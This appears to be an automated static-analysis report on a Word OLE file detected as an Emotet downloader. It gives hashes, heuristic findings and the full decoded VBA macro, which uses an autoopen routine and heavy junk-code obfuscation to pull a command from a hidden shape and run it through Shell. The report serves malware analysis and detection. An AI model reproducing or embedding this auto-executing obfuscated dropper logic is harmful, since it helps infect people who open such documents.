Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d567010c93cb4f0b…

MALICIOUS

Office (OLE)

137.6 KB Created: 2018-12-11 09:22:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 7d923847971a1e74e12c99653e114647 SHA-1: eb10fc082251b12072ea2c1ae7123393bf36d447 SHA-256: d567010c93cb4f0b1100e00abd90e1e911ec246262cd0bec5716078ad4cbd843
252 Risk Score

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-6899225-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6899225-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     _
    .Shell(iihfU, jChzFM), YXtwPRj)
       zISRQFrULdSlRZslbHilSOH = (242593722 + Round(JQShbkjFrQbBbDLOHUzGfIij) * 293021783 - wzNckBhRGpZmksijaIRjzE + (WLtHiUAhmpmlmrPjaU / Tan(zWpVkGXwiZOJouar)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    shdSmRDc
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4597 bytes
SHA-256: 265c9cf6c22a1e817af8fb92d806ed1d2511ba9fd43d6a92fe07a15d49daa20c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
131 of 160 identifiers look randomly generated (e.g. 'jkpfXDfWtbhToiVjAlXpVfYZ') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vTqErLCw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
shdSmRDc
End Sub

Attribute VB_Name = "HCHMtlFZj"
Function shdSmRDc()
On Error Resume Next
   AwiaUizEQnGwuztfOmAWk = (205715811 + Round(YiUHYCTXluwdrGnN) * 155653977 - ZzunzzRvzVKSqAVlKr + (WbCzPVDwUCYbYdBKfQklXpcC / Tan(MSDvHFwwOAuXCiSuzztbtlpp)))
qVZGchwzzDCzCMwcfKcGmd = 250163150
   EbnPRFYTtcAzfjwIkt = (191263656 + Round(TchIDOBwpiAsqJAIAz) * 147476688 - qukbcbOitdSdwRDbtfLCDZd + (cIHWinIkXmiZsFfb / Tan(XFMPXvZGYPVoUn)))
QZzUUsvFUiGKmijnz = 236723661
   LOaKBwbGlcpzQfC = (28994865 + Round(PahdfAHzrIzpkt) * 166389160 - DXonYFSciduFcI + (uqMqOqffOSLKncQ / Tan(jQwMHNRbJIEuBF)))
WiCEzXDKMYsaVN = 312670286
   nDwbiEnzHzHzcwGcfwi = (336938489 + Round(SiAjasQTTcNpBaRRFsD) * 71886539 - UwqJBYPzJKSIwUUzvDMXjoWt + (aVoLaGioiwmJXYTA / Tan(JRvjDFzTKornQjazzb)))
anjEnUUWioYfsX = 78080880
   iriKFtWvwYscwcbjW = (322803382 + Round(FJGwPwnhMnYVPi) * 170113639 - zcKXmjwTkwDCobYNEJ + (FXuPLSLKIaCcwWIiELZ / Tan(WLnMSuktkOKRGCUzC)))
wEaYpshUFjfzTCir = 35725263
   zSPASNXHPvYhHOfzGjrS = (7228865 + Round(MRvRHZSAMDIOThENCqpz) * 234944177 - NISwJRdVUWdVFwF + (FwpPiVZsuwvsdA / Tan(BuHEmwJPAXqilkwbGHBl)))
JUXsiZELVksTsbbwtSCwjp = 289355865
   ZNobvoUzQrksPJnLDU = (212195589 + Round(SJuNZNGYuhbZCdaRGfroRj) * 118303093 - STJLdVlJMNBPSaCihvDiQLp + (jVFXcsZjrzuGDuvYwSMpbK / Tan(fdJGVfjiHdXcIPOjUoSXTfvi)))
AimwwAKYWZtTlDDIVncfSm = 59078559
Set zdXQr = vTqErLCw.Shapes(flIwQE + "GFtELIoGcL" + VzVDm)
   iwnjQwpzHvwRjXMD = (225928437 + Round(tiSSlVLCwdYizRv) * 311475531 - fqMmmkZKcwMZhCCZ + (vvtPLSVNBMZZwhWoMjM / Tan(WGwtHIYwdObWIYVzBv)))
XrYkXAljPplVWpEEpw = 1816059
   ZGTWHmbkNtujWM = (21398115 + Round(UkduKJJXowCSFqsnvfiN) * 84010373 - uAqtIuDGaHGYzObPpQwv + (LkJfWAGlripSoqcERAOTh / Tan(uLhtiLfpNQQwjQjNlu)))
VjYQFJXwKXPicAppzwdVuFBU = 167718962
Const jChzFM = 0
   mupJWHcFOLlmSqXB = (260608324 + Round(nEidNUiJvnKBGqbDwZbCfqOH) * 307959119 - KAYqYKwIcWcJhViNMovNFuKO + (wZkTwqbiNJdkEPACzOFbosG / Tan(RiZMhuPqKwakNpfjAbT)))
AcHZuLHjEmDGTMBR = 110697699
   kNOrOatGsIQDwrAitWAbDM = (127372426 + Round(YqsXmBkpsfwfsSwEcrLhOjF) * 128568140 - oQmjnnYtUTXhVT + (XbLSuVlbawzMAlfplZUwkwI / Tan(sYlYzYWHXUKnXmY)))
DpLkobXIodlIBVGZSGaWk = 82873495
   XwtYDzCraoPYrdKMwAwWQlRE = (326469995 + Round(IzGtwPYqHkjjYicuHdjTPCpa) * 175837405 - bjflhobGqEkhsAABVafMbSt + (ioVdiGIjSBooKWDsIS / Tan(YJaliTNhPuOTIqJGtSzYkw)))
OrMMrzXnDIiUMD = 18122610
   WrNsNkooFuTvEREYRqahw = (323795048 + Round(iJqHjtQLVfwizqaDCz) * 204040167 - UmswCzzbXHDlZXiiXcHvpiw + (GiEiqnXiTCzvQrFjv / Tan(nNcMJcLsjZrjFlocrTsPlk)))
USWXjRfXYzBvknuZcXwGw = 280417084
iihfU = zdXQr.TextFrame.TextRange + pWzRVn + iZaNY + tnaFpQ + XvTRBnN + zzfMph + ZARNCCk + MuRzfjKC + VznVV + oXdJmUPn
   dwtKtGIcbJKzHdYPC = (10106445 + Round(zraZJklDaFMrQiM) * 242092869 - QasaXstpTFNAviTPiPXCXkZ + (ChXORuOusfzcIia / Tan(jkpfXDfWtbhToiVjAlXpVfYZ)))
SHPjrHEpZVmuujzCBVpMvGJ = 65188653
   iKYhsXPDCNwsfQMAanKn = (102804067 + Round(aZwThRwQiUOcYLoOHA) * 335624877 - NXsHounXBNvIPJjwjZqzH + (iiiDrBLLfJofHDhrimdZOV / Tan(FMPcqfiKBcasOclDmLp)))
lUjCjRsvDUhXJFYqbZVjz = 339000062
   AtDVwmczJRKKkoFb = (319978975 + Round(AsvfOcjOJpfXFiaIXHHa) * 217294863 - zCAOiNLCzIKwuJQUfalkdm + (lLbjbQwUWwMvtfAuVC / Tan(rXNIoRsCbjowKKh)))
CGdjmzonwhOWpfjPi = 153367847
   UIPSDEaTruvEhWYGPazK = (90784784 + Round(EWXvBmWViwodAFcuwAju) * 331417452 - CfOOUwEOIXQpDsv + (CozVPwQEWTiVizi / Tan(jzUrjmSXQQqQMKBkwn)))
rzcsFPJsAUjkLtzJGXDbQVZF = 335054692
   RrzahVVjzIrdCtszJVmkj = (167165372 + Round(sIGAWUAFqNdiVAfjt) * 95481615 - HodwcMmGdshkCrZF + (aVwPzCAQYPWzilsVS / Tan(dOMinkOWNJcbmvvMJ)))
PwKlcjDzQIzGoOjZvqG = 311681421
sLRuWqAmV = Array(EPcWu, DhjiWP, uMvMh, Interaction _
 _
 _
 _
 _
 _
 _
 _
.Shell(iihfU, jChzFM), YXtwPRj)
   zISRQFrULdSlRZslbHilSOH = (242593722 + Round(JQShbkjFrQbBbDLOHUzGfIij) * 293021783 - wzNckBhRGpZmksijaIRjzE + (WLtHiUAhmpmlmrPjaU / Tan(zWpVkGXwiZOJouar)))
qtCzFHnwzGwpKcrPq = 45135014
   jEviACkNWMKNZVUFoYmUbCp = (7215191 + Round(GtmInffoAjudzRXUwdJFTUPk) * 25855011 - ijuSjPuitIwFjhfZZoZbqG + (zcZfvcliBEAwwuhAi / Tan(PYOVtucauvaLcvbUupGjw)))
HizBikifrousbiA = 194752238
   LRCAaXmpVNtkOrp = (208016152 + Round(qrNzHWtBfINpPdcGXIz) * 305202819 - ktaPsUjkYbaHVCNHHDuI + (uPZzGjQirjqltFwmjPCKRHjn / Tan(taPwPEFlhpdBQllTFhrkW)))
zOUYnrwjnimRMIAjbfk = 339839145
End Function